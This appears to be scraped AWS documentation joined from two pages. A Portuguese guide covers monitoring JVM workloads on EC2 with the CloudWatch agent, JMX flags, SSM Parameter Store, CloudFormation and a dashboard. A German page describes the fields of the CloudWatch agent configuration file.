-Dcom.sun.management.jmxremote.authenticate=false -Dcom.sun.management.jmxremote.ssl=false Analise os scripts de inicialização e os arquivos de configuração da aplicação para encontrar o local mais adequado para adicionar esses argumentos. Quando você executar um arquivo .jar usando a linha de comando, o comando pode ser semelhante ao apresentado a seguir, em que pet-search.jar é o nome do arquivo JAR da aplicação. $ java -jar -Dcom.sun.management.jmxremote -Dcom.sun.management.jmxremote.port=9999 -Dcom.sun.management.jmxremote.authenticate=false -Dcom.sun.management.jmxremote.ssl=false pet-search.jar Configuração do agente para esta solução As métricas coletadas pelo agente são definidas na configuração do agente. A solução fornece configurações do agente para a coleta das métricas recomendadas com dimensões adequadas para o painel da solução. As etapas para a implantação da solução são descritas posteriormente em Implantação do agente para a sua solução . As informações apresentadas a seguir são destinadas a ajudar você a compreender como personalizar a configuração do agente para o seu ambiente. Você deve personalizar algumas partes da seguinte configuração do agente para o seu ambiente: O número da porta do JMX corresponde ao número da porta que você configurou na seção anterior desta documentação. Esse número está na linha endpoint na configuração. ProcessGroupName : forneça nomes significativos para a dimensão ProcessGroupName . Esses nomes devem representar o agrupamento de clusters, de aplicações ou de serviços para as instâncias do EC2 que executam aplicações ou processos semelhantes. Isso auxilia no agrupamento de métricas de instâncias que pertencem ao mesmo grupo de processos da JVM, proporcionando uma visão unificada da performance do cluster, da aplicação e do serviço no painel da solução. Por exemplo, caso você tenha duas aplicações em Java em execução na mesma conta, sendo uma para a aplicação order-processing e a outra para a aplicação inventory-management , é necessário configurar as dimensões ProcessGroupName de maneira adequada na configuração do agente de cada instância. Para as instâncias da aplicação order-processing , defina ProcessGroupName=order-processing . Para as instâncias da aplicação inventory-management , defina ProcessGroupName=inventory-management . Ao seguir essas diretrizes, o painel da solução agrupará automaticamente as métricas com base na dimensão ProcessGroupName . O painel incluirá opções do menu suspenso para a seleção e para a visualização de métricas de um grupo de processos específico, permitindo o monitoramento da performance de grupos de processos individuais separadamente. Configuração do agente para hosts da JVM Use a configuração do agente do CloudWatch apresentada a seguir nas instâncias do EC2 em que as aplicações em Java estão implantadas. A configuração será armazenada como um parâmetro no Parameter Store do SSM, conforme detalhado posteriormente em Etapa 2: armazenar o arquivo de configuração recomendado do agente do CloudWatch no Systems Manager Parameter Store . Substitua ProcessGroupName pelo nome do grupo de processos. Substitua port-number pelo número da porta do JMX da aplicação em Java. Se o JMX tiver sido habilitado com autenticação por senha ou SSL para acesso remoto, consulte Coletar métricas do Java Management Extensions (JMX) para obter informações sobre como configurar o TLS ou a autorização na configuração do agente, conforme necessário. As métricas do EC2 mostradas nesta configuração (configuração apresentada de forma externa ao bloco do JMX) funcionam somente para instâncias do Linux e do macOS. Caso esteja usando instâncias do Windows, é possível optar por omitir essas métricas na configuração. Para obter mais informações sobre as métricas coletadas em instâncias do Windows, consulte Métricas coletadas pelo atendente do CloudWatch em instâncias do Windows Server . { "metrics": { "namespace": "CWAgent", "append_dimensions": { "InstanceId": "$ { aws:InstanceId}" }, "metrics_collected": { "jmx": [ { "endpoint": "localhost: port-number ", "jvm": { "measurement": [ "jvm.classes.loaded", "jvm.gc.collections.count", "jvm.gc.collections.elapsed", "jvm.memory.heap.committed", "jvm.memory.heap.max", "jvm.memory.heap.used", "jvm.memory.nonheap.committed", "jvm.memory.nonheap.max", "jvm.memory.nonheap.used", "jvm.threads.count" ] }, "append_dimensions": { "ProcessGroupName": " ProcessGroupName " } } ], "disk": { "measurement": [ "used_percent" ] }, "mem": { "measurement": [ "used_percent" ] }, "swap": { "measurement": [ "used_percent" ] }, "netstat": { "measurement": [ "tcp_established", "tcp_time_wait" ] } } } } Implantação do agente para a sua solução Existem várias abordagens para instalar o agente do CloudWatch, dependendo do caso de uso. Recomendamos o uso do Systems Manager para esta solução. Ele fornece uma experiência no console e simplifica o gerenciamento de uma frota de servidores gerenciados em uma única conta da AWS. As instruções apresentadas nesta seção usam o Systems Manager e são destinadas para situações em que o agente do CloudWatch não está em execução com as configurações existentes. É possível verificar se o agente do CloudWatch está em execução ao seguir as etapas apresentadas em Verificar se o atendente do CloudWatch está em execução . Se você já estiver executando o agente do CloudWatch nos hosts do EC2 nos quais a workload está implantada e gerenciando as configurações do agente, pode pular as instruções apresentadas nesta seção e usar o mecanismo de implantação existente para atualizar a configuração. Certifique-se de combinar a configuração do agente da JVM com a configuração do agente existente e, em seguida, implante a configuração combinada. Se você estiver usando o Systems Manager para armazenar e gerenciar a configuração do agente do CloudWatch, poderá combinar a configuração com o valor do parâmetro existente. Para obter mais informações, consulte Managing CloudWatch agent configuration files . nota Ao usar o Systems Manager para implantar as configurações do agente do CloudWatch apresentadas a seguir, qualquer configuração existente do agente do CloudWatch nas suas instâncias do EC2 será substituída ou sobrescrita. É possível modificar essa configuração para atender às necessidades do ambiente ou do caso de uso específico. As métricas definidas nesta solução representam o requisito mínimo para o painel recomendado. O processo de implantação inclui as seguintes etapas: Etapa 1: garantir que as instâncias do EC2 de destino têm as permissões do IAM necessárias. Etapa 2: armazenar o arquivo de configuração recomendado do agente no Systems Manager Parameter Store. Etapa 3: instalar o agente do CloudWatch em uma ou mais instâncias do EC2 usando uma pilha do CloudFormation. Etapa 4: verificar se a configuração do agente foi realizada corretamente. Etapa 1: garantir que as instâncias do EC2 de destino têm as permissões do IAM necessárias Você deve conceder permissão para o Systems Manager instalar e configurar o agente do CloudWatch. Além disso, é necessário conceder permissão para que o agente do CloudWatch publique a telemetria da instância do EC2 para o CloudWatch. Certifique-se de que o perfil do IAM anexado à instância tenha as políticas do IAM CloudWatchAgentServerPolicy e AmazonSSMManagedInstanceCore associadas. Após criar o perfil, associe-o às suas instâncias do EC2. Siga as etapas apresentadas em Launch an instance with an IAM role para anexar um perfil durante a inicialização de uma nova instância do EC2. Para anexar um perfil a uma instância do EC2 existente, siga as etapas apresentadas em Attach an IAM role to an instance . Etapa 2: armazenar o arquivo de configuração recomendado do agente do CloudWatch no Systems Manager Parameter Store O Parameter Store simplifica a instalação do agente do CloudWatch em uma instância do EC2 ao armazenar e gerenciar os parâmetros de configuração de forma segura, eliminando a necessidade de valores com codificação rígida. Isso garante um processo de implantação mais seguro e flexível ao possibilitar o gerenciamento centralizado e as atualizações simplificadas para as configurações em diversas instâncias. Use as etapas apresentadas a seguir para armazenar o arquivo de configuração recomendado do agente do CloudWatch como um parâmetro no Parameter Store. Como criar o arquivo de configuração do agente do CloudWatch como um parâmetro Abra o console AWS Systems Manager em https://console.aws.amazon.com/systems-manager/ . No painel de navegação, escolha Gerenciamento de aplicações e, em seguida, Parameter Store . Siga as etapas apresentadas a seguir para criar um novo parâmetro para a configuração. Escolha Criar Parâmetro . Na caixa Nome , insira um nome que será usado para referenciar o arquivo de configuração do agente do CloudWatch nas etapas posteriores. Por exemplo, . AmazonCloudWatch-JVM-Configuration (Opcional) Na caixa Descrição , digite uma descrição para o parâmetro. Em Camadas de parâmetros , escolha Padrão . Para Tipo , escolha String . Em Tipo de dados , selecione texto . Na caixa Valor , cole o bloco em JSON correspondente que foi listado em Configuração do agente para hosts da JVM . Certifique-se de personalizar o valor da dimensão de agrupamento e o número da porta, conforme descrito. Escolha Criar Parâmetro . Etapa 3: instalar o agente do CloudWatch e aplicar a configuração usando um modelo do CloudFormation É possível usar o AWS CloudFormation para instalar o agente e configurá-lo para usar a configuração do agente do CloudWatch criada nas etapas anteriores. Como instalar e configurar o agente do CloudWatch para esta solução Abra o assistente para criar pilha de forma rápida do CloudFormation usando este link: https://console.aws.amazon.com/cloudformation/home?#/stacks/quickcreate?templateURL=https://aws-observability-solutions-prod-us-east-1.s3.us-east-1.amazonaws.com/CloudWatchAgent/CFN/v1.0.0/cw-agent-installation-template-1.0.0.json . Verifique se a região selecionada no console corresponde à região em que a workload da JVM está em execução. Em Nome da pilha , insira um nome para identificar esta pilha, como CWAgentInstallationStack . Na seção Parâmetros , especifique o seguinte: Para CloudWatchAgentConfigSSM , insira o nome do parâmetro do Systems Manager para a configuração do agente que você criou anteriormente, como AmazonCloudWatch-JVM-Configuration . Para selecionar as instâncias de destino, você tem duas opções. Para InstanceIds , especifique uma lista delimitada por vírgulas de IDs de instâncias nas quais você deseja instalar o agente do CloudWatch com esta configuração. É possível listar uma única instância ou várias instâncias. Se você estiver realizando implantações em grande escala, é possível especificar a TagKey e o TagValue correspondente para direcionar todas as instâncias do EC2 associadas a essa etiqueta e a esse valor. Se você especificar uma TagKey , é necessário especificar um TagValue correspondente. (Para um grupo do Auto Scaling, especifique aws:autoscaling:groupName para a TagKey e defina o nome do grupo do Auto Scaling para a TagValue para realizar a implantação em todas as instâncias do grupo do Auto Scaling.) Caso você especifique tanto os parâmetros InstanceIds quanto TagKeys , InstanceIds terá precedência, e as etiquetas serão desconsideradas. Analise as configurações e, em seguida, escolha Criar pilha . Se você desejar editar o arquivo de modelo previamente para personalizá-lo, selecione a opção Fazer upload de um arquivo de modelo no Assistente de criação de pilha para fazer o upload do modelo editado. Para obter mais informações, consulte Criar uma pilha no console do CloudFormation . É possível usar o seguinte link para fazer download do modelo: https://aws-observability-solutions-prod-us-east-1.s3.us-east-1.amazonaws.com/CloudWatchAgent/CFN/v1.0.0/cw-agent-installation-template-1.0.0.json . nota Após a conclusão desta etapa, este parâmetro do Systems Manager será associado aos agentes do CloudWatch em execução nas instâncias de destino. Isto significa que: Se o parâmetro do Systems Manager for excluído, o agente será interrompido. Se o parâmetro do Systems Manager for editado, as alterações de configuração serão aplicadas automaticamente ao agente na frequência programada, que, por padrão, é de 30 dias. Se você desejar aplicar imediatamente as alterações a este parâmetro do Systems Manager, você deverá executar esta etapa novamente. Para obter mais informações sobre as associações, consulte Working with associations in Systems Manager . Etapa 4: verificar se a configuração do agente foi realizada corretamente É possível verificar se o agente do CloudWatch está instalado ao seguir as etapas apresentadas em Verificar se o atendente do CloudWatch está em execução . Se o agente do CloudWatch não estiver instalado e em execução, certifique-se de que todas as configurações foram realizadas corretamente. Certifique-se de ter anexado um perfil com as permissões adequadas para a instância do EC2, conforme descrito na Etapa 1: garantir que as instâncias do EC2 de destino têm as permissões do IAM necessárias . Certifique-se de ter configurado corretamente o JSON para o parâmetro do Systems Manager. Siga as etapas em Solução de problemas de instalação do atendente do CloudWatch com o CloudFormation . Se todas as configurações estiverem corretas, as métricas da JVM serão publicadas no CloudWatch e estarão disponíveis para visualização. É possível verificar no console do CloudWatch para assegurar que as métricas estão sendo publicadas corretamente. Como verificar se as métricas da JVM estão sendo publicadas no CloudWatch Abra o console do CloudWatch, em https://console.aws.amazon.com/cloudwatch/ . Escolha Métricas e, depois, Todas as métricas . Certifique-se de ter selecionado a região na qual a solução foi implantada, escolha Namespaces personalizados e, em seguida, selecione CWAgent . Pesquise pelas métricas mencionadas em Configuração do agente para hosts da JVM , como jvm.memory.heap.used . Caso encontre resultados para essas métricas, isso significa que elas estão sendo publicadas no CloudWatch. Criação de um painel para a solução da JVM O painel fornecido por esta solução apresenta métricas para a Java Virtual Machine (JVM) subjacente para o servidor. O painel fornece uma visão geral da JVM ao agregar e apresentar métricas de todas as instâncias, disponibilizando um resumo de alto nível sobre a integridade geral e o estado operacional. Além disso, o painel mostra um detalhamento dos principais colaboradores (que corresponde aos dez principais por widget de métrica) para cada métrica. Isso ajuda a identificar rapidamente discrepâncias ou instâncias que contribuem significativamente para as métricas observadas. O painel da solução não exibe métricas do EC2. Para visualizar as métricas relacionadas ao EC2, é necessário usar o painel automático do EC2 para acessar as métricas fornecidas diretamente pelo EC2 e usar o painel do console do EC2 para consultar as métricas do EC2 que são coletadas pelo agente do CloudWatch. Para obter mais informações sobre os painéis automáticos para serviços da AWS, consulte Visualização de um painel do CloudWatch para um único serviço da AWS . Para criar o painel, é possível usar as seguintes opções: Usar o console do CloudWatch para criar o painel. Usar o console do AWS CloudFormation para implantar o painel. Fazer o download do código de infraestrutura como código do AWS CloudFormation e integrá-lo como parte da automação de integração contínua (CI). Ao usar o console do CloudWatch para criar um painel, é possível visualizá-lo previamente antes de criá-lo e incorrer em custos. nota O painel criado com o CloudFormation nesta solução exibe métricas da região em que a solução está implantada. Certifique-se de que a pilha do CloudFormation seja criada na mesma região em que as métricas da JVM são publicadas. Se as métricas do agente do CloudWatch estiverem sendo publicadas em um namespace diferente de CWAgent (por exemplo, caso você tenha fornecido um namespace personalizado), será necessário alterar a configuração do CloudFormation para substituir CWAgent pelo namespace personalizado que você está usando. Como criar o painel usando o console do CloudWatch nota Atualmente, os painéis de soluções exibem métricas relacionadas à coleta de resíduos somente para o G1 Garbage Collector, que é o coletor padrão para as versões mais recentes do Java. Caso esteja usando um algoritmo de coleta de resíduos diferente, os widgets relacionados à coleta de resíduos estarão vazios. No entanto, você pode personalizar esses widgets alterando o modelo do painel do CloudFormation e aplicando o tipo de coleta de resíduos apropriado à dimensão do nome das métricas relacionadas à coleta de resíduos. Por exemplo, se você estiver usando a coleta de resíduos paralela, altere name=\"G1 Young Generation\" para name=\"Parallel GC\" da métrica de contagem de coleta de resíduos jvm.gc.collections.count . Abra o console do CloudWatch e acesse Criar painel usando este link: https://console.aws.amazon.com/cloudwatch/home?#dashboards?dashboardTemplate=JvmOnEc2&referrer=os-catalog . Verifique se a região selecionada no console corresponde à região em que a workload da JVM está em execução. Insira o nome do painel e, em seguida, escolha Criar painel . Para diferenciar este painel de painéis semelhantes em outras regiões com facilidade, recomendamos incluir o nome da região no nome do painel, por exemplo, JVMDashboard-us-east-1 . Visualize previamente o painel e escolha Salvar para criá-lo. Como criar o painel usando o CloudFormation Abra o assistente para criar pilha de forma rápida do CloudFormation usando este link: https://console.aws.amazon.com/cloudformation/home?#/stacks/quickcreate?templateURL=https://aws-observability-solutions-prod-us-east-1.s3.us-east-1.amazonaws.com/JVM_EC2/CloudWatch/CFN/v1.0.0/dashboard-template-1.0.0.json . Verifique se a região selecionada no console corresponde à região em que a workload da JVM está em execução. Em Nome da pilha , insira um nome para identificar esta pilha, como JVMDashboardStack . Na seção Parâmetros , especifique o nome do painel no parâmetro DashboardName . Para diferenciar este painel de painéis semelhantes em outras regiões com facilidade, recomendamos incluir o nome da região no nome do painel, por exemplo, JVMDashboard-us-east-1 . Confirme as funcionalidades de acesso relacionadas às transformações na seção Capacidades e transformações . Lembre-se de que o CloudFormation não adiciona recursos do IAM. Analise as configurações e, em seguida, escolha Criar pilha . Quando o status da pilha mostrar CREATE_COMPLETE , selecione a guia Recursos na pilha criada e, em seguida, escolha o link exibido em ID físico para acessar o painel. Como alternativa, é possível acessar o painel diretamente no console do CloudWatch ao selecionar Painéis no painel de navegação do console à esquerda e localizar o nome do painel na seção Painéis personalizados . Se você desejar editar o arquivo de modelo para personalizá-lo para atender a uma necessidade específica, é possível usar a opção Fazer upload de um arquivo de modelo no Assistente de criação de pilha para fazer o upload do modelo editado. Para obter mais informações, consulte Criar uma pilha no console do CloudFormation . É possível usar este link para fazer download do modelo: https://aws-observability-solutions-prod-us-east-1.s3.us-east-1.amazonaws.com/JVM_EC2/CloudWatch/CFN/v1.0.0/dashboard-template-1.0.0.json . nota Atualmente, os painéis de soluções exibem métricas relacionadas à coleta de resíduos somente para o G1 Garbage Collector, que é o coletor padrão para as versões mais recentes do Java. Caso esteja usando um algoritmo de coleta de resíduos diferente, os widgets relacionados à coleta de resíduos estarão vazios. No entanto, você pode personalizar esses widgets alterando o modelo do painel do CloudFormation e aplicando o tipo de coleta de resíduos apropriado à dimensão do nome das métricas relacionadas à coleta de resíduos. Por exemplo, se você estiver usando a coleta de resíduos paralela, altere name=\"G1 Young Generation\" para name=\"Parallel GC\" da métrica de contagem de coleta de resíduos jvm.gc.collections.count . Como começar a usar o painel da JVM A seguir, apresentamos algumas tarefas que você pode realizar para explorar o novo painel da JVM. Essas tarefas permitem a validação do funcionamento correto do painel e fornecem uma experiência prática ao usá-lo para monitorar um grupo de processos da JVM. À medida que realiza as tarefas, você se familiarizará com a navegação no painel e com a interpretação das métricas visualizadas. Seleção de um grupo de processos Use a lista suspensa Nome do grupo de processos da JVM para selecionar o grupo de processos que você deseja monitorar. O painel será atualizado automaticamente para exibir as métricas para o grupo de processos selecionado. Caso você tenha várias aplicações ou ambientes em Java, cada um pode ser representado como um grupo de processos distinto. Selecionar o grupo de processos apropriado garante que você estará visualizando as métricas específicas para a aplicação ou para o ambiente que deseja analisar. Análise do uso de memória Na seção de visão geral do painel, localize os widgets de Porcentagem de uso de memória do heap e de Porcentagem de uso de memória não relacionada ao heap . Os widgets mostram a porcentagem de memória do heap e de memória não relacionada ao heap usadas em todas as JVMs no grupo de processos selecionado. Uma porcentagem elevada pode indicar pressão da memória, o que pode resultar em problemas de performance ou exceções OutOfMemoryError . Além disso, é possível realizar uma busca detalhada do uso de memória do heap por host na seção Uso de memória por host para identificar os hosts com maior utilização. Análise de threads e de classes carregadas Na seção Threads e classes carregadas pelo host , localize os widgets Contagem dos dez principais threads e Dez principais classes carregadas . Procure por JVMs que tenham um número anormalmente elevado de threads ou de classes em comparação com as demais. Um número excessivo de threads pode ser indicativo de vazamentos de threads ou de simultaneidade excessiva, enquanto um grande número de classes carregadas pode indicar possíveis vazamentos no carregador de classes ou problemas com a geração ineficiente de classes dinâmicas. Identificação de problemas de coleta de resíduos Na seção de Coleta de resíduos , localize os widgets Dez principais invocações de coleta de resíduos por minuto e Dez principais duração da coleta de resíduos , separados pelos diferentes tipos de coletor de lixo: Recente , Simultânea e Mista . Procure por JVMs que tenham um número anormalmente elevado de coleções ou de durações longas de coleta em comparação com as demais. Isso pode indicar problemas de configuração ou vazamentos de memória. O Javascript está desativado ou não está disponível no seu navegador. Para usar a documentação da AWS, o Javascript deve estar ativado. Consulte as páginas de Ajuda do navegador para obter instruções. Convenções do documento Soluções de observabilidade do CloudWatch Workload do NGINX no EC2 Essa página foi útil? - Sim Obrigado por nos informar que estamos fazendo um bom trabalho! Se tiver tempo, conte-nos sobre o que você gostou para que possamos melhorar ainda mais. Essa página foi útil? - Não Obrigado por nos informar que precisamos melhorar a página. Lamentamos ter decepcionado você. Se tiver tempo, conte-nos como podemos melhorar a documentação. | 2026-01-13T09:29:26 |
https://docs.aws.amazon.com/de_de/AmazonCloudWatch/latest/monitoring/CloudWatch-Agent-Configuration-File-Details.html | Erstellen oder bearbeiten Sie die CloudWatch Agenten-Konfigurationsdatei manuell - Amazon CloudWatch Erstellen oder bearbeiten Sie die CloudWatch Agenten-Konfigurationsdatei manuell - Amazon CloudWatch Dokumentation Amazon CloudWatch Benutzer-Leitfaden Manuelles Speichern der Agentenkonfigurationsdatei Laden Sie die CloudWatch Agentenkonfigurationsdatei in den Systems Manager Parameter Store hoch Die vorliegende Übersetzung wurde maschinell erstellt. Im Falle eines Konflikts oder eines Widerspruchs zwischen dieser übersetzten Fassung und der englischen Fassung (einschließlich infolge von Verzögerungen bei der Übersetzung) ist die englische Fassung maßgeblich. Erstellen oder bearbeiten Sie die CloudWatch Agenten-Konfigurationsdatei manuell Die CloudWatch Agenten-Konfigurationsdatei ist eine JSON-Datei mit vier Abschnitten: agent metrics , logs , und traces . Der Abschnitt agent enthält Felder für die allgemeine Konfiguration des Agenten. metrics In diesem Abschnitt werden die benutzerdefinierten Metriken für die Erfassung und Veröffentlichung angegeben CloudWatch. Wenn Sie den Agenten nur verwenden, um Protokolle zu erfassen, können Sie den Abschnitt metrics in der Datei weglassen. logs In diesem Abschnitt wird angegeben, welche Protokolldateien in CloudWatch Logs veröffentlicht werden. Hierbei kann es sich u. a. um Ereignisse aus dem Windows-Ereignisprotokoll handeln, wenn auf dem Server Windows Server ausgeführt wird. traces In diesem Abschnitt werden die Quellen für Traces angegeben, die gesammelt und an sie gesendet werden AWS X-Ray. In diesem Abschnitt werden die Struktur und die Felder der CloudWatch Agentenkonfigurationsdatei erläutert. Sie können die Schemadefinition für diese Konfigurationsdatei anzeigen. Die Schemadefinition befindet sich auf Linux-Servern unter installation-directory /doc/amazon-cloudwatch-agent-schema.json und auf Servern mit Windows Server unter installation-directory /amazon-cloudwatch-agent-schema.json . Wenn Sie die -Agentenkonfigurationsdatei manuell erstellen oder bearbeiten, können Sie ihr einen beliebigen Namen geben. Zur Vereinfachung der Fehlerbehebung wird empfohlen, ihr auf Linux-Servern den Namen /opt/aws/amazon-cloudwatch-agent/etc/cloudwatch-agent.json und auf Servern, auf denen Windows Server ausgeführt wird, den Namen $Env:ProgramData\Amazon\AmazonCloudWatchAgent\amazon-cloudwatch-agent.json zu geben. Anschließend können Sie die Datei auf andere Server kopieren, auf denen der Agent installiert werden soll. Wenn der Agent gestartet wird, erstellt er eine Kopie jeder Konfigurationsdatei im Verzeichnis /opt/aws/amazon-cloudwatch/etc/amazon-cloudwatch-agent.d , wobei dem Dateinamen entweder file_ (für lokale Dateiquellen) oder ssm_ (für Systems Manager Manager-Parameterspeicherquellen) vorangestellt wird, um den Ursprung der Konfiguration anzugeben. Anmerkung Für die vom CloudWatch Agenten gesammelten Metriken, Protokolle und Traces fallen Gebühren an. Weitere Informationen zur Preisgestaltung finden Sie unter CloudWatchAmazon-Preise . Der Abschnitt agent kann die folgenden Felder enthalten: Der Assistent erstellt keinen Abschnitt agent . Stattdessen lässt der Assistent diesen weg und verwendet die Standardwerte für alle Felder in diesem Abschnitt. metrics_collection_interval – Optional. Gibt an, wie oft alle in dieser Konfigurationsdatei angegebenen Metriken erfasst werden. Sie können den Wert für bestimmte Arten von Metriken überschreiben. Der Wert wird in Sekunden angegeben. Beispiel: Angeben, dass 10 Metriken alle 10 Sekunden und 300 Metriken alle 5 Minuten gesammelt werden sollen. Wenn Sie diesen Wert auf weniger als 60 Sekunden festlegen, wird die jeweilige Metrik als hochauflösende Metrik erfasst. Weitere Informationen zu hochauflösenden Metriken finden Sie unter Hochauflösende Metriken . Der Standardwert lautet 60. region — Gibt die Region an, die für den CloudWatch Endpunkt verwendet werden soll, wenn eine EC2 Amazon-Instance überwacht wird. Die gesammelten Metriken werden an diese Region gesendet, wie z. B. us-west-1 . Wenn Sie dieses Feld weglassen, sendet der Agent Metriken an die Region, in der sich die EC2 Amazon-Instance befindet. Wenn Sie einen On-Premises-Server überwachen, wird dieses Feld nicht verwendet, und der Agent liest die Region aus dem AmazonCloudWatchAgent -Profil der AWS -Konfigurationsdatei. credentials — Gibt eine IAM-Rolle an, die beim Senden von Metriken, Protokollen und Traces an ein anderes AWS Konto verwendet werden soll. Sofern angegeben, enthält dieses Feld einen Parameter, role_arn . role_arn — Gibt den Amazon-Ressourcennamen (ARN) einer IAM-Rolle an, der für die Authentifizierung verwendet werden soll, wenn Metriken, Logs und Traces an ein anderes AWS Konto gesendet werden. Weitere Informationen finden Sie unter Metriken, Protokolle und Ablaufverfolgungen an ein anderes Konto senden . debug – Optional. Gibt an, dass der CloudWatch Agent mit Debug-Protokollmeldungen ausgeführt wird. Der Standardwert ist false . aws_sdk_log_level – Optional. Wird nur in den Versionen 1.247350.0 und höher des Agenten unterstützt. CloudWatch Sie können dieses Feld angeben, damit der Agent die Protokollierung für AWS SDK-Endpunkte durchführt. Der Wert für dieses Feld kann eine oder mehrere der folgenden Optionen enthalten. Trennen Sie mehrere Optionen mit dem | -Zeichen. LogDebug LogDebugWithSigning LogDebugWithHTTPBody LogDebugRequestRetries LogDebugWithEventStreamBody Weitere Informationen zu diesen Optionen finden Sie unter LogLevelType . logfile — Gibt den Ort an, an dem der CloudWatch Agent Protokollnachrichten schreibt. Wenn Sie eine leere Zeichenfolge angeben, wird das Protokoll in stderr abgelegt. Wenn Sie diese Option nicht angeben, lauten die Standardspeicherorte folgendermaßen: Linux: /opt/aws/amazon-cloudwatch-agent/logs/amazon-cloudwatch-agent.log Windows Server: c:\\ProgramData\\Amazon\\CloudWatchAgent\\Logs\\amazon-cloudwatch-agent.log Der CloudWatch Agent rotiert die von ihm erstellte Protokolldatei automatisch. Eine Protokolldatei wird rotiert, wenn sie eine Größe von 100 MB erreicht. Der Agent bewahrt die rotierten Protokolldateien bis zu sieben Tage lang auf, und er behält bis zu fünf Backup-Protokolldateien, die ausgelagert werden. Die Dateinamen der Sicherungen von Protokolldateien werden um einen Zeitstempel ergänzt. Der Zeitstempel gibt das Datum und die Uhrzeit der Rotation an, z. B. amazon-cloudwatch-agent-2018-06-08T21-01-50.247.log.gz . omit_hostname – Optional. Standardmäßig wird der Hostname als Dimension von Metriken veröffentlicht, die vom Agenten erfasst werden, es sei denn, Sie verwenden das append_dimensions -Feld im metrics -Abschnitt. Setzen Sie omit_hostname auf true , um zu verhindern, dass der Hostname als Dimension veröffentlicht wird, auch wenn Sie append_dimensions nicht verwenden. Der Standardwert ist false . run_as_user – Optional. Gibt einen Benutzer an, der zum Ausführen des CloudWatch -Agenten verwendet werden soll. Wenn Sie diesen Parameter nicht angeben, wird der Root-Benutzer verwendet. Diese Option ist nur auf Linux-Servern gültig. Wenn Sie diese Option angeben, muss der Benutzer vorhanden sein, bevor Sie den CloudWatch Agenten starten. Weitere Informationen finden Sie unter Den CloudWatch Agenten als anderer Benutzer ausführen . user_agent – Optional. Gibt die user-agent Zeichenfolge an, die vom CloudWatch Agenten verwendet wird, wenn er API-Aufrufe an das CloudWatch Backend tätigt. Der Standardwert ist eine Zeichenfolge, die aus der Agentenversion, der Version der Go-Programmiersprache, die zum Kompilieren des Agenten verwendet wurde, dem Laufzeitbetriebssystem und der Architektur, der Buildzeit und den aktivierten Plugins besteht. usage_data – Optional. Standardmäßig sendet der CloudWatch Agent Integritäts- und Leistungsdaten über sich selbst an, CloudWatch wann immer er Metriken oder Protokolle veröffentlicht. CloudWatch Für diese Daten entstehen Ihnen keine Kosten. Sie können verhindern, dass der Agent diese Daten sendet, indem Sie false für usage_data angeben. Wenn Sie diesen Parameter weglassen, wird der Standard von true verwendet, und der Agent sendet die Zustands- und Leistungsdaten. Wenn Sie diesen Wert auf false setzen, müssen Sie den Agenten beenden und neu starten, damit die Änderung wirksam wird. service.name – Optional. Gibt den Servicenamen an, der verwendet werden soll, um die Entität für die Suche nach zugehöriger Telemetrie mit Werten zu befüllen. deployment.environment – Optional. Gibt den Umgebungsnamen an, der verwendet werden soll, um die Entität für die Suche nach zugehöriger Telemetrie mit Werten zu befüllen. use_dualstack_endpoint – Optional. Wenn dies der Fall ist true , verwendet der CloudWatch Agent Dual-Stack-Endpunkte für alle API-Aufrufe. Es folgt ein Beispiel für den Abschnitt agent . "agent": { "metrics_collection_interval": 60, "region": "us-west-1", "logfile": "/opt/aws/amazon-cloudwatch-agent/logs/amazon-cloudwatch-agent.log", "debug": false, "run_as_user": "cwagent" } Gemeinsame Felder für Linux und Windows Auf Servern mit Linux oder Windows Server enthält der Abschnitt metrics die folgenden Felder: namespace – Optional. Der Namespace für die vom Agent zu erfassenden Metriken. Der Standardwert ist CWAgent . Die maximale Länge beträgt 255 Zeichen. Im Folgenden wird ein Beispiel gezeigt: { "metrics": { "namespace": "Development/Product1Metrics", ...... }, } append_dimensions – Optional. Fügt allen vom Agenten gesammelten Metriken EC2 Amazon-Kennzahlen hinzu. Dies bewirkt auch, dass der Agent den Hostnamen nicht als Dimension veröffentlicht. Die einzigen unterstützten Schlüssel-Wert-Paare für append_dimensions werden in der folgenden Liste angezeigt. Alle anderen Schlüssel-Wert-Paare werden ignoriert. Der Agent unterstützt diese Schlüssel-Wert-Paare genau so, wie sie in der folgenden Liste aufgeführt sind. Sie können die Schlüsselwerte nicht ändern, um unterschiedliche Dimensionsnamen für sie zu veröffentlichen. "ImageId":"$ { aws:ImageId}" legt die AMI-ID der Instance als Wert der ImageId -Dimension fest. "InstanceId":"$ { aws:InstanceId}" legt die Instance-ID der Instance als Wert der InstanceId -Dimension fest. "InstanceType":"$ { aws:InstanceType}" legt den Instance-Typ der Instance als Wert der InstanceType -Dimension fest. "AutoScalingGroupName":"$ { aws:AutoScalingGroupName}" legt den Namen der Auto Scaling-Gruppe der Instance als Wert der AutoScalingGroupName -Dimension fest. Wenn Sie Dimensionen an Metriken mit beliebigen Schlüssel-Wert-Paaren anfügen möchten, verwenden Sie den Parameter append_dimensions im Feld für diesen bestimmten Metriktyp. Wenn Sie einen Wert angeben, der von EC2 Amazon-Metadaten abhängt, und Sie Proxys verwenden, müssen Sie sicherstellen, dass der Server auf den Endpunkt für Amazon zugreifen kann. EC2 Weitere Informationen zu diesen Endpunkten finden Sie unter Amazon Elastic Compute Cloud (Amazon EC2) in der Allgemeine Amazon Web Services-Referenz . aggregation_dimensions – Optional. Gibt die Dimensionen an, in denen erfasste Metriken aggregiert werden sollen. Beispiel: Wenn Sie Metriken in der AutoScalingGroupName -Dimension zusammenführen, werden die Metriken aus allen Instances in der jeweiligen Auto-Scaling-Gruppe aggregiert und können als Ganzes angezeigt werden. Sie können Metriken in einer einzelnen oder in mehreren Dimensionen zusammenfassen. Beispiel: Wenn Sie [["InstanceId"], ["InstanceType"], ["InstanceId","InstanceType"]] festlegen, werden Metriken für die Instance-ID einzeln, den Instance-Typ einzeln und für die Kombination der beiden Dimensionen aggregiert. Sie können auch [] angeben, um alle Metriken in einer Sammlung ungeachtet jeglicher Dimensionen zusammenzufassen. endpoint_override – Gibt einen FIPS-Endpunkt oder einen privaten Link an, der als Endpunkt verwendet wird, an den der Agent Metriken sendet. Wenn Sie dies angeben und einen privaten Link einrichten, können Sie die Metriken an eine Amazon-VPC-Endpunkt senden. Weitere Informationen finden Sie unter Was ist Amazon VPC? Der Wert von endpoint_override muss eine Zeichenkette sein, die eine URL ist. Beispielsweise legt der folgende Teil des Metrikabschnitts der Konfigurationsdatei fest, dass der Agent beim Senden von Metriken einen VPC-Endpunkt verwendet. { "metrics": { "endpoint_override": "vpce-XXXXXXXXXXXXXXXXXXXXXXXXX.monitoring.us-east-1.vpce.amazonaws.com", ...... }, } metrics_collected – Erforderlich. Gibt an, welche Metriken erfasst werden sollen, 